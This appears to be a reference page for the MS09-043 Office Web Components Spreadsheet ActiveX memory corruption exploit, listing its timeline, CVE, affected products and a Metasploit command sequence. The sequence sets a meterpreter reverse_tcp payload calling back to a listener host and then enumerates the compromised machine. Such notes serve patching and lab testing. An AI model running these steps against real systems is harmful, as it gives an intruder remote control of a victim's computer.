MS09-043 : Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption

Timeline :

Vulnerability reported to Microsoft by ZDI the 2007-03-19
Metasploit PoC provided by hdm the 2009-07-13
Milw0rm PoC provided by anonymous the 2009-07-16
Microsoft patch “KB947319” provided the 2009-08-11

PoC provided by :

unknown
hdm
Ahmed Obied
DSR

Reference(s) :

CVE-2009-1136
MS09-043

Affected version(s) :

Microsoft Office XP Service Pack 3
Microsoft Office 2003 Service Pack 3
Microsoft Office 2000 Web Components SP3
Microsoft Office XP Web Components SP3
Microsoft Office 2003 Web Components SP3
Microsoft Office 2003 Web Components SP1 for the 2007 Microsoft Office System
Microsoft Internet Security and Acceleration Server 2004 Standard Edition SP3
Microsoft Internet Security and Acceleration Server 2004 Enterprise Edition SP3
Microsoft Internet Security and Acceleration Server 2006 Standard Edition SP1
Microsoft Internet Security and Acceleration Server 2006 Enterprise Edition SP1
Microsoft BizTalk Server 2002
Microsoft Visual Studio .NET 2003 SP1
Microsoft Office Small Business Accounting 2006

Tested on Windows XP SP3 with :

Office 2003 SP3 before KB947319

Description :

This module exploits a memory corruption vulnerability within versions 10 and 11 of the Office Web Component Spreadsheet ActiveX control. This module was based on an exploit found in the wild.

Commands :

use exploit/windows/browser/ms09_043_owc_msdĀ­so
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig